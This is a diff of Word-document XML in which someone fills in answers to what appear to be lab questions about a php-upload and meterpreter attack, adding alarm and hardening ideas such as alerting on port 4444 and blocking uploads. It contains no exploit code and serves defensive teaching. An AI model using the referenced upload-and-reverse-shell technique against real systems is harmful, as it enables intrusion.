+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Meta.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1656,13 +1674,49 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Create an alarm that would trigger anytime this directory is accessed by an unauthorized machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Connections to this folder should not be accessible from web interface</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Access to this folder should be restricted by machine by firewall rules. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1709,8 +1763,21 @@
           <w:numId w:val="7"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">No </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Yes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> by destination port 4444. 4444 is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> default port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1729,12 +1796,48 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Alarm for anything on port 4444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Alert for php uploads</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Remove the ability to upload files</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
